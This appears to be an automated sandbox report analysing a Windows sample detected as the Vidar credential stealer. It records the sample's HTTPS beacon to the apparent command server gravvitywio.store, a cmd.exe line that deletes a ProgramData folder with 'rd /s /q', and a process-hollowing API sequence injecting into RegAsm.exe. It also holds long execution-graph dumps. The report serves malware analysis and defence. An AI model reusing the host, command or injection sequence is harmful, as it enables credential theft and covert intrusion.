                                                                                                                                                      2024-10-03 07:16:53 UTC171INData Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                      Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      33192.168.2.649757104.21.16.124435388C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-10-03 07:16:54 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                      Content-Length: 8
                                                                                                                                                      Host: gravvitywio.store
                                                                                                                                                      2024-10-03 07:16:54 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                      Data Ascii: act=life
                                                                                                                                                      2024-10-03 07:16:54 UTC780INHTTP/1.1 200 OK
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:54 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      Set-Cookie: PHPSESSID=gjsf2rjagode809eh5nbehc1ko; expires=Mon, 27 Jan 2025 01:03:33 GMT; Max-Age=9999999; path=/
                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1SwkNNMGsafBh8TTQNtlVjTuyzUmDXzHUJ%2FefoLzAfFR2riDiykf86PllD6HXMyXsbSuPmvaOCAFV6QHLwFbwWRmaIBpZNqCKC%2FcRsJ2eO%2B%2FNXmhFp%2BZNiQqZZ9HRwXsqEx%2FbQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      CF-RAY: 8ccb2640b93b43cd-EWR
                                                                                                                                                      2024-10-03 07:16:54 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                      Data Ascii: aerror #D12
                                                                                                                                                      2024-10-03 07:16:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 0


                                                                                                                                                      Statistics

                                                                                                                                                      CPU Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      Memory Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                      Behavior

                                                                                                                                                      Click to jump to process

                                                                                                                                                      System Behavior

                                                                                                                                                      General

                                                                                                                                                      Target ID:0
                                                                                                                                                      Start time:03:15:41
                                                                                                                                                      Start date:03/10/2024
                                                                                                                                                      Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                      Imagebase:0xeb0000
                                                                                                                                                      File size:423'840 bytes
                                                                                                                                                      MD5 hash:7B5E8E3DB2CE9C97F6A8214A4CCD3872
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2144562432.0000000004195000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.2144562432.0000000004195000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:1
                                                                                                                                                      Start time:03:15:41
                                                                                                                                                      Start date:03/10/2024
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:3
                                                                                                                                                      Start time:03:15:41
                                                                                                                                                      Start date:03/10/2024
                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                      Imagebase:0xcd0000
                                                                                                                                                      File size:65'440 bytes
                                                                                                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:7
                                                                                                                                                      Start time:03:16:43
                                                                                                                                                      Start date:03/10/2024
                                                                                                                                                      Path:C:\ProgramData\ECBKKKFHCF.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\ProgramData\ECBKKKFHCF.exe"
                                                                                                                                                      Imagebase:0xdd0000
                                                                                                                                                      File size:391'072 bytes
                                                                                                                                                      MD5 hash:BE9E376D9BAB656B145A7C8316636903
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Antivirus matches:
                                                                                                                                                      • Detection: 34%, ReversingLabs
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:8
                                                                                                                                                      Start time:03:16:43
                                                                                                                                                      Start date:03/10/2024
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:9
                                                                                                                                                      Start time:03:16:43
                                                                                                                                                      Start date:03/10/2024
                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                      Imagebase:0x1e0000
                                                                                                                                                      File size:65'440 bytes
                                                                                                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:10
                                                                                                                                                      Start time:03:16:43
                                                                                                                                                      Start date:03/10/2024
                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                      Imagebase:0x5d0000
                                                                                                                                                      File size:65'440 bytes
                                                                                                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:11
                                                                                                                                                      Start time:03:16:47
                                                                                                                                                      Start date:03/10/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\IJJKKJJDAAAA" & exit
                                                                                                                                                      Imagebase:0x1c0000
                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:12
                                                                                                                                                      Start time:03:16:47
                                                                                                                                                      Start date:03/10/2024
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:13
                                                                                                                                                      Start time:03:16:47
                                                                                                                                                      Start date:03/10/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:timeout /t 10
                                                                                                                                                      Imagebase:0x880000
                                                                                                                                                      File size:25'088 bytes
                                                                                                                                                      MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Disassembly

                                                                                                                                                      Reset < >

                                                                                                                                                        Execution Graph

                                                                                                                                                        Execution Coverage:28.8%
                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                        Signature Coverage:30%
                                                                                                                                                        Total number of Nodes:20
                                                                                                                                                        Total number of Limit Nodes:0

                                                                                                                                                        Executed Functions

                                                                                                                                                        Function 03192139 Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 282threadinjectionmemoryCOMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,031920AB,0319209B), ref: 031922A8
                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 031922BB
                                                                                                                                                        • Wow64GetThreadContext.KERNEL32(000003D4,00000000), ref: 031922D9
                                                                                                                                                        • ReadProcessMemory.KERNELBASE(000003D8,?,031920EF,00000004,00000000), ref: 031922FD
                                                                                                                                                        • VirtualAllocEx.KERNELBASE(000003D8,?,?,00003000,00000040), ref: 03192328
                                                                                                                                                        • WriteProcessMemory.KERNELBASE(000003D8,00000000,?,?,00000000,?), ref: 03192380
                                                                                                                                                        • WriteProcessMemory.KERNELBASE(000003D8,00400000,?,?,00000000,?,00000028), ref: 031923CB
                                                                                                                                                        • WriteProcessMemory.KERNELBASE(000003D8,-00000008,?,00000004,00000000), ref: 03192409
                                                                                                                                                        • Wow64SetThreadContext.KERNEL32(000003D4,06080000), ref: 03192445
                                                                                                                                                        • ResumeThread.KERNELBASE(000003D4), ref: 03192454
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2143139534.0000000003191000.00000040.00000800.00020000.00000000.sdmp, Offset: 03191000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_3191000_file.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                                                                        • API String ID: 2687962208-1257834847
                                                                                                                                                        • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                                        • Instruction ID: 03d98bdc350091a6e8a533290a8bce1636db70575720ad1f8f34ea4ef2397fd1
                                                                                                                                                        • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                                        • Instruction Fuzzy Hash: A5B1F67660024AAFDB60CF68CC80BDA73A9FF8C714F158565EA0CAB341D774FA518B94
                                                                                                                                                        Function 01881510 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 297 1881510-1881516 298 1881518 297->298 299 1881519-18815a5 VirtualProtectEx 297->299 298->299 302 18815ac-18815cd 299->302 303 18815a7 299->303 303->302
                                                                                                                                                        APIs
                                                                                                                                                        • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 01881598
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2143005704.0000000001880000.00000040.00000800.00020000.00000000.sdmp, Offset: 01880000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_1880000_file.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                                        • Opcode ID: 10f3dcd6e004bdbb0be9648ebb87198b5941d4bab56ee6f04bc450bdc9e87810
                                                                                                                                                        • Instruction ID: 0d25987d627f3c516b127f920e877b65e7f9fb052280fa55af171d49d2376f46
                                                                                                                                                        • Opcode Fuzzy Hash: 10f3dcd6e004bdbb0be9648ebb87198b5941d4bab56ee6f04bc450bdc9e87810
                                                                                                                                                        • Instruction Fuzzy Hash: 6B2104B58002499FDB10DFAAC885ADEFBF4FF48310F14841AE919A7250C7759911CFA5
                                                                                                                                                        Function 01881518 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 306 1881518-18815a5 VirtualProtectEx 310 18815ac-18815cd 306->310 311 18815a7 306->311 311->310
                                                                                                                                                        APIs
                                                                                                                                                        • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 01881598
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2143005704.0000000001880000.00000040.00000800.00020000.00000000.sdmp, Offset: 01880000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_1880000_file.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                                        • Opcode ID: e35539e5781e5327196a3b14b8dfb6b3312ace61fa3fe241a9e7bc482b2ffab3
                                                                                                                                                        • Instruction ID: e55c6c8227e6543e20410e29cc2bc67035a47a61e9d4d9e5b7902cd1bf2e27a5
                                                                                                                                                        • Opcode Fuzzy Hash: e35539e5781e5327196a3b14b8dfb6b3312ace61fa3fe241a9e7bc482b2ffab3
                                                                                                                                                        • Instruction Fuzzy Hash: 0A2113B18002499FDB10DFAAC880ADEFBF4FF48310F10842AE919A7250C775A910CFA5
                                                                                                                                                        Function 017ED01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 477 17ed01d-17ed03d 478 17ed03f-17ed04a 477->478 479 17ed08d-17ed095 477->479 480 17ed04c-17ed05a 478->480 481 17ed082-17ed089 478->481 479->478 483 17ed060 480->483 481->480 486 17ed08b 481->486 485 17ed063-17ed06b 483->485 487 17ed06d-17ed075 485->487 488 17ed07b-17ed080 485->488 486->485 488->487
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2142792448.00000000017ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 017ED000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_17ed000_file.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 3e384bc7a791dfb1daff3e6c0562f16a7d178c7e6aa7b95802ea3f38eaf22df8
                                                                                                                                                        • Instruction ID: 6b6a4e284f793ce65703e257e8213bf3577bdf75cb442c45b6468cd91752a13c
                                                                                                                                                        • Opcode Fuzzy Hash: 3e384bc7a791dfb1daff3e6c0562f16a7d178c7e6aa7b95802ea3f38eaf22df8
                                                                                                                                                        • Instruction Fuzzy Hash: C701F7315053449AE7309AA9CD88B67FFD8EF492A4F1C855AED490E182C279D442C6B1
                                                                                                                                                        Function 017ED01C Relevance: .0, Instructions: 36COMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 498 17ed01c-17ed03d 500 17ed03f-17ed04a 498->500 501 17ed08d-17ed095 498->501 502 17ed04c-17ed05a 500->502 503 17ed082-17ed089 500->503 501->500 505 17ed060 502->505 503->502 508 17ed08b 503->508 507 17ed063-17ed06b 505->507 509 17ed06d-17ed075 507->509 510 17ed07b-17ed080 507->510 508->507 510->509
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2142792448.00000000017ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 017ED000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_17ed000_file.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: c423d9d0082aec6c59e63c013245507be41417c77185c98472e8b3c9ef7b15b4
                                                                                                                                                        • Instruction ID: a03076fdab75dc6051b277a997fccae29b9eb17d05ebacc26496ea9e1a42c318
                                                                                                                                                        • Opcode Fuzzy Hash: c423d9d0082aec6c59e63c013245507be41417c77185c98472e8b3c9ef7b15b4
                                                                                                                                                        • Instruction Fuzzy Hash: 98F0F071005344AEF7208E1ACCC8B63FFD8EB85678F28C55AED480F286C3799841CAB1

                                                                                                                                                        Execution Graph

                                                                                                                                                        Execution Coverage:4.3%
                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                        Signature Coverage:4.6%
                                                                                                                                                        Total number of Nodes:2000
                                                                                                                                                        Total number of Limit Nodes:30
                                                                                                                                                        execution_graph 86576 6c603060 ?Startup@TimeStamp@mozilla@ ?Now@TimeStamp@mozilla@@CA?AV12@_N ?InitializeUptime@mozilla@ 86581 6c63ab2a 86576->86581 86580 6c6030db 86585 6c63ae0c _crt_atexit _register_onexit_function 86581->86585 86583 6c6030cd 86584 6c63b320 5 API calls ___raise_securityfailure 86583->86584 86584->86580 86585->86583 86586 6c6035a0 86587 6c6035c4 InitializeCriticalSectionAndSpinCount getenv 86586->86587 86588 6c603846 __aulldiv 86586->86588 86590 6c6038fc strcmp 86587->86590 86600 6c6035f3 __aulldiv 86587->86600 86603 6c63b320 5 API calls ___raise_securityfailure 86588->86603 86592 6c603912 strcmp 86590->86592 86590->86600 86591 6c6038f4 86592->86600 86593 6c6035f8 QueryPerformanceFrequency 86593->86600 86594 6c603622 _strnicmp 86596 6c603944 _strnicmp 86594->86596 86594->86600 86595 6c60376a QueryPerformanceCounter EnterCriticalSection 86599 6c6037b3 LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 86595->86599 86602 6c60375c 86595->86602 86598 6c60395d 86596->86598 86596->86600 86597 6c603664 GetSystemTimeAdjustment 86597->86600 86601 6c6037fc LeaveCriticalSection 86599->86601 86599->86602 86600->86593 86600->86594 86600->86596 86600->86597 86600->86598 86600->86602 86601->86588 86601->86602 86602->86588 86602->86595 86602->86599 86602->86601 86603->86591 86604 6c61c930 GetSystemInfo VirtualAlloc 86605 6c61c9a3 GetSystemInfo 86604->86605 86606 6c61c973 86604->86606 86608 6c61c9d0 86605->86608 86609 6c61c9b6 86605->86609 86620 6c63b320 5 API calls ___raise_securityfailure 86606->86620 86608->86606 86612 6c61c9d8 VirtualAlloc 86608->86612 86609->86608 86611 6c61c9bd 86609->86611 86610 6c61c99b 86611->86606 86615 6c61c9c1 VirtualFree 86611->86615 86613 6c61c9f0 86612->86613 86614 6c61c9ec 86612->86614 86621 6c63cbe8 GetCurrentProcess TerminateProcess 86613->86621 86614->86606 86615->86606 86620->86610 86622 6c63b830 86623 6c63b83b 86622->86623 86624 6c63b86e dllmain_crt_process_detach 86622->86624 86625 6c63b860 dllmain_crt_process_attach 86623->86625 86626 6c63b840 86623->86626 86624->86626 86625->86626 86627 6c63b9c0 86628 6c63b9c9 86627->86628 86629 6c63b9ce dllmain_dispatch 86627->86629 86631 6c63bef1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 86628->86631 86631->86629 86632 6c63b694 86633 6c63b6a0 ___scrt_is_nonwritable_in_current_image 86632->86633 86662 6c63af2a 86633->86662 86635 6c63b6a7 86636 6c63b6d1 86635->86636 86637 6c63b796 86635->86637 86648 6c63b6ac ___scrt_is_nonwritable_in_current_image 86635->86648 86666 6c63b064 86636->86666 86679 6c63b1f7 IsProcessorFeaturePresent 86637->86679 86640 6c63b6e0 __RTC_Initialize 86640->86648 86669 6c63bf89 InitializeSListHead 86640->86669 86641 6c63b7b3 ___scrt_uninitialize_crt __RTC_Initialize 86643 6c63b6ee ___scrt_initialize_default_local_stdio_options 86645 6c63b6f3 _initterm_e 86643->86645 86644 6c63b79d ___scrt_is_nonwritable_in_current_image 86644->86641 86646 6c63b7d2 86644->86646 86647 6c63b828 86644->86647 86645->86648 86650 6c63b708 86645->86650 86683 6c63b09d _execute_onexit_table _cexit ___scrt_release_startup_lock 86646->86683 86649 6c63b1f7 ___scrt_fastfail 6 API calls 86647->86649 86653 6c63b82f 86649->86653 86670 6c63b072 86650->86670 86658 6c63b83b 86653->86658 86659 6c63b86e dllmain_crt_process_detach 86653->86659 86654 6c63b7d7 86684 6c63bf95 __std_type_info_destroy_list 86654->86684 86655 6c63b70d 86655->86648 86657 6c63b711 _initterm 86655->86657 86657->86648 86660 6c63b860 dllmain_crt_process_attach 86658->86660 86661 6c63b840 86658->86661 86659->86661 86660->86661 86663 6c63af33 86662->86663 86685 6c63b341 IsProcessorFeaturePresent 86663->86685 86665 6c63af3f ___scrt_uninitialize_crt 86665->86635 86686 6c63af8b 86666->86686 86668 6c63b06b 86668->86640 86669->86643 86671 6c63b077 ___scrt_release_startup_lock 86670->86671 86672 6c63b082 86671->86672 86673 6c63b07b 86671->86673 86676 6c63b087 _configure_narrow_argv 86672->86676 86696 6c63b341 IsProcessorFeaturePresent 86673->86696 86675 6c63b080 86675->86655 86677 6c63b092 86676->86677 86678 6c63b095 _initialize_narrow_environment 86676->86678 86677->86655 86678->86675 86680 6c63b20c ___scrt_fastfail 86679->86680 86681 6c63b218 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 86680->86681 86682 6c63b302 ___scrt_fastfail 86681->86682 86682->86644 86683->86654 86684->86641 86685->86665 86687 6c63af9a 86686->86687 86688 6c63af9e 86686->86688 86687->86668 86689 6c63b028 86688->86689 86692 6c63afab ___scrt_release_startup_lock 86688->86692 86690 6c63b1f7 ___scrt_fastfail 6 API calls 86689->86690 86691 6c63b02f 86690->86691 86693 6c63afb8 _initialize_onexit_table 86692->86693 86695 6c63afd6 86692->86695 86694 6c63afc7 _initialize_onexit_table 86693->86694 86693->86695 86694->86695 86695->86668 86696->86675 86697 41848d 86698 418494 86697->86698 86701 41d016 86698->86701 86700 4184a9 86702 41d020 IsDebuggerPresent 86701->86702 86703 41d01e 86701->86703 86709 41d975 86702->86709 86703->86700 86706 41d460 SetUnhandledExceptionFilter UnhandledExceptionFilter 86707 41d485 GetCurrentProcess TerminateProcess 86706->86707 86708 41d47d __call_reportfault 86706->86708 86707->86700 86708->86707 86709->86706 86710 6c63b8ae 86712 6c63b8ba ___scrt_is_nonwritable_in_current_image 86710->86712 86711 6c63b8e3 dllmain_raw 86714 6c63b8c9 86711->86714 86715 6c63b8fd dllmain_crt_dispatch 86711->86715 86712->86711 86713 6c63b8de 86712->86713 86712->86714 86723 6c61bed0 DisableThreadLibraryCalls LoadLibraryExW 86713->86723 86715->86713 86715->86714 86717 6c63b91e 86718 6c63b94a 86717->86718 86724 6c61bed0 DisableThreadLibraryCalls LoadLibraryExW 86717->86724 86718->86714 86719 6c63b953 dllmain_crt_dispatch 86718->86719 86719->86714 86720 6c63b966 dllmain_raw 86719->86720 86720->86714 86722 6c63b936 dllmain_crt_dispatch dllmain_raw 86722->86718 86723->86717 86724->86722 86725 4184ae 86726 4184b0 86725->86726 86779 402b68 86726->86779 86735 401284 25 API calls 86736 4184df 86735->86736 86737 401284 25 API calls 86736->86737 86738 4184e9 86737->86738 86894 40148a GetPEB 86738->86894 86740 4184f3 86741 401284 25 API calls 86740->86741 86742 4184fd 86741->86742 86743 401284 25 API calls 86742->86743 86744 418507 86743->86744 86745 401284 25 API calls 86744->86745 86746 418511 86745->86746 86895 4014a2 GetPEB 86746->86895 86748 41851b 86749 401284 25 API calls 86748->86749 86750 418525 86749->86750 86751 401284 25 API calls 86750->86751 86752 41852f 86751->86752 86753 401284 25 API calls 86752->86753 86754 418539 86753->86754 86896 4014f9 86754->86896 86757 401284 25 API calls 86758 41854d 86757->86758 86759 401284 25 API calls 86758->86759 86760 418557 86759->86760 86761 401284 25 API calls 86760->86761 86762 418561 86761->86762 86778 401284 25 API calls 86762->86778 86763 418562 86919 401666 GetTempPathW 86763->86919 86766 401284 25 API calls 86767 418570 86766->86767 86768 401284 25 API calls 86767->86768 86769 41857a 86768->86769 86770 401284 25 API calls 86769->86770 86771 418584 86770->86771 86931 417041 86771->86931 86778->86763 87356 4047e8 GetProcessHeap HeapAlloc 86779->87356 86782 4047e8 3 API calls 86783 402b93 86782->86783 86784 4047e8 3 API calls 86783->86784 86785 402bac 86784->86785 86786 4047e8 3 API calls 86785->86786 86787 402bc3 86786->86787 86788 4047e8 3 